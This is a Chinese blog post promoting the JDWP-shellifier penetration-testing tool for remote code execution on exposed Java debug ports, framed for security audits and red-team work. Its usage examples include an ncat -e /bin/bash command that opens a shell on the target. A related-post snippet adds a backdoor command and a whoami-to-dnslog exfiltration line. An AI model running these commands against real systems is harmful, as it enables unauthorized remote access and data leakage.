探索JDWP漏洞利用:JDWP-shellifier脚本

于 2024-05-17 09:48:52 发布
阅读量443 收藏 8
点赞数 5
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gitblog_00020/article/details/138995372
版权

探索JDWP漏洞利用:JDWP-shellifier脚本

项目简介

JDWP-shellifier 是一个由安全研究人员开发的渗透测试工具,旨在针对运行中的JDWP(Java Debug Wire Protocol)服务进行远程代码执行攻击。这个开源项目提供了一种简便的方法,让安全专业人员能够评估和利用JDWP的安全风险。

技术分析

JDWP-shellifier基于Python 2,使用命令行接口,操作简单直观。它的工作原理是在目标系统的JVM上注入Java代码,然后根据提供的选项执行特定的操作。默认情况下,它会显示操作系统信息和Java版本,确保了在不执行任何外部代码的情况下作为Proof-of-Concept使用。通过添加--cmd参数,你可以指定要执行的命令或程序,从而实现远程代码执行。

例如,你可以使用如下命令针对指定主机和端口发起攻击:

python ./jdwp-shellifier.py -t my.target.ip -p 1234

如果你想执行一个如ncat的外部命令,可以这样操作:

python ./jdwp-shellifier.py -t my.target.ip -p 1234 --cmd "ncat -v -l -p 1234 -e /bin/bash"

在这个例子中,ncat将以JVM的权限运行,并开启一个交互式的shell。

对于想要深入了解JDWP协议的人来说,项目作者推荐阅读Ilja Van Sprundel和Sebastien Macke的博客

应用场景

JDWP-shellifier适用于网络安全审计环境,尤其是对Java应用进行渗透测试时。如果你负责检查组织的内部安全,或者正在进行红队演练,这个工具可以帮助你快速识别并利用JDWP服务中的潜在安全漏洞。

项目特点

  1. 易用性:只需简单的Python 2环境,无需额外配置。
  2. 灵活性:可自定义注入的Java代码,执行任意命令或程序。
  3. 安全性:默认模式仅显示系统信息,不会触发恶意行为。
  4. 教育意义:帮助学习者理解JDWP协议及其安全影响。

总的来说,JDWP-shellifier是安全社区的一个宝贵资源,为那些需要在可控环境中了解和利用JDWP漏洞的人提供了便利。无论你是新手还是经验丰富的安全专家,都值得将这个工具纳入你的安全检测工具箱。

周澄诗Flourishing
关注
  • 5
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
JDWP原理分析与漏洞利用
liudong200618的博客
01-26 1241
JDWP(Java DEbugger Wire Protocol):即Java调试线协议,是一个为Java调试而设计的通讯交互协议,它定义了调试器和被调试程序之间传递的信息的格式。
浅析JDWP远程命令执行漏洞 [ Mi1k7ea ]1
08-03
2022/3/2 下午8:30浅析JDWP远程命令执漏洞 [ Mi1k7ea ]https://www.mi1k7ea.com/2021/08/06/浅析JDW
漏洞复现】JDWP远程命令执行漏洞
weixin_43486390的博客
03-02 6081
0x01 漏洞描述 JPDA(Java Platform Debugger Architecture):即Java平台调试体系架构。Java虚拟机设计的专门的API接口供调试和监控虚拟机使用 JPDA按照抽象层次,又分为三层,分别是: JVM TI(Java VM Tool Interface):虚拟机对外暴露的接口,包括debug和profile。 JDI(Java Debug Interface):Java库接口,实现了JDWP协议的客户端,调试器可以用来和远程被调试应用通信。 JDWP(Java
JDWP漏洞验证
anan的博客
04-06 3256
前言 JDWP 是 Java Debug Wire Protocol 的缩写,它定义了调试器(debugger)和被调试的 Java 虚拟机(target vm)之间的通信协议。 JDWP就是JAVA的一个调试协议。本质上我们通过IDEA或者eclipse通过断点的方式调试JAVA应用时,使用的就是JDWP。因为是调试协议,不可能带有认证信息,那么对于一个开启了调试端口的JAVA应用,我们就可能利用JDWP进行调试,最终执行命令。在什么时候会使用到JDWP这种协议呢?比如你在线上跑了一个应用,但是这个问题只
IDEA远程调试与JDWP调试端口RCE漏洞
道阻且长,行则将至。
12-10 949
在对一些 Java CVE 漏洞的调试分析过程中,本地 IDEA 搭建漏洞环境的话既麻烦又不安全,这个时候如果能直接在虚拟机运行 Vulhub 提供的 Docker 靶场并使用物理机 IDEA 对其进行远程调试,那么这项工作就显得安全便捷了。本文来学习下如何通过 IDEA 远程调试远程 Docker 服务的靶场环境,同时学习此类调试环境衍生的服务器安全风险——JDWP调试接口对外开放导致RCE漏洞
java JDWP调试接口任意命令执行漏洞
tangshuangsss的专栏
12-16 5562
点击"仙网攻城狮”关注我们哦~不当想研发的渗透人不是好运维让我们每天进步一点点简介JDWP(Java DEbugger Wire Protocol):即Java调试线协议,是一个为Java...
基于 jdwp-shellifier 的进阶JDWP漏洞利用脚本(动态执行Java_Js代码并获得回显).zip
最新发布
02-07
python chatgpt
JDWP 远程命令执行 检查工具
04-26
JDWP 远程命令执行检查工具,JDWP(Java DEbugger Wire Protocol):即Java调试线协议,是一个为Java调试而设计的通讯交互协议,它定义了调试器和被调试程序之间传递的信息的格式。说白了就是JVM或者类JVM的虚拟机都...
深入Java调试体系(JPDA-JDWP)
03-13
JPDA 主要由三个部分组成:Java 虚拟机工具接口(JVMTI),Java 调试线协议(JDWP),以及 Java 调试接口(JDI),本系列将会详细介绍这三个模块的内部细节、通过实例为读者揭开 JPDA 的面纱。
java8集合源码分析-geektime-java-week-training-camp:极客时间-Java每周训练营
06-04
内置图形界面工具、JDWP 简介、JMX 与相关工具; 常见的 JVM GC 算法(Parallel GC/CMS GC/G1 GC)基本原理和特点; 新一代 GC 算法(Java11 ZGC/Java12 Shenandoah) 和 Oracle GraalVM; GC 日志解读与分析、JVM 的...
远程命令执行漏洞
08-10
NULL 博文链接:https://crabdave.iteye.com/blog/2211641
JDWP 远程命令执行漏洞
热门推荐
Brucetg的博客
09-20 2万+
0x01. Java 调试体系JPDA简介 JPDA(Java Platform Debugger Architecture):即Java平台调试体系架构。Java虚拟机设计的专门的API接口供调试和监控虚拟机使用 JPDA按照抽象层次,又分为三层,分别是: JVM TI(Java VM Tool Interface):虚拟机对外暴露的接口,包括debug和profile。 JDWP(Java ...
java jdwp_利用 JAVA 调试协议 JDWP 实现反弹 shell
weixin_35971708的博客
02-13 773
说明前面已经有两篇文章介绍了有关反弹shell的内容,使用Java反弹shell和绕过exec获取反弹shell。之前的文章主要聚焦如何使用java来反弹shell。网上的各种文章也是将各种反弹shell的一句话的写法。但是鲜有文章分析不同反弹shell的方式之间的差异性,以及反弹shell之间的进程关联。初识BASH还是以最为简单的反弹shell为例来说明情况:bash -i >&...
JDWP未授权快速利用
爱测未来团队博客
09-04 2423
JDWP简介 这里首先要说明一下 debugger 和 target vm。Target vm 中运行着我们希望要调试的程序,它与一般运行的 Java 虚拟机没有什么区别,只是在启动时加载了 Agent JDWP 从而具备了调试功能。而 debugger 就是我们熟知的调试器,它向运行中的 target vm 发送命令来获取 target vm 运行时的状态和控制 Java 程序的执行。Debu...
Java Debugger JDWP Agent Library
tterminator的专栏
08-02 1501
一、调出帮助信息在终端下执行如下命令: java -agentlib:jdwp=help二、具体帮助信息 Java Debugger JDWP Agent Library -------------------------------- (see http://java.sun.com/products/jpda for more inf
jdwp命令执行
公众号shadow sock7
10-18 8415
利用脚本: https://github.com/IOActive/jdwp-shellifier 命令成功执行 用wireshark抓包发现
常见端口对应服务及其漏洞
qq_67473072的博客
07-14 1499
常见端口对应服务及其漏洞
java - jdwp远程调试线协议的使用
小草飞上天
06-13 1715
JDWP(Java Debug Wire Protocol)调试线协议,及通过客户端与远程java服务程序之间的传输协议。
jdwp-shellifier
07-28
jdwp-shellifier是一个漏洞利用脚本,用于利用Java Debug Wire Protocol (JDWP)的漏洞进行攻击。通过该脚本,攻击者可以执行命令并获取目标系统的访问权限。\[1\]脚本的使用方法包括设置目标IP和端口,以及指定要执行的命令。例如,可以使用"--cmd"参数执行命令"ping http://.`whoami`.yoww7w.dnslog.cn"来查看回显效果,或者使用"--cmd"参数执行命令"whoami"来获取当前用户的信息。\[1\]\[2\]此外,还可以使用"--cmd"参数开启一个后门,使用nc命令进行连接。例如,可以使用"--cmd"参数执行命令"ncat -lvvp 1234 -e /bin/bash"来开启一个监听端口,并使用nc进行连接。\[3\]请注意,使用jdwp-shellifier进行攻击是非法的,且可能导致严重的安全问题。建议只在合法授权的情况下使用该脚本。 #### 引用[.reference_title] - *1* *2* [JDWP漏洞验证](https://blog.csdn.net/weixin_42380348/article/details/115464387)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [java JDWP调试接口任意命令执行漏洞](https://blog.csdn.net/tangshuangsss/article/details/121987666)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

周澄诗Flourishing

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值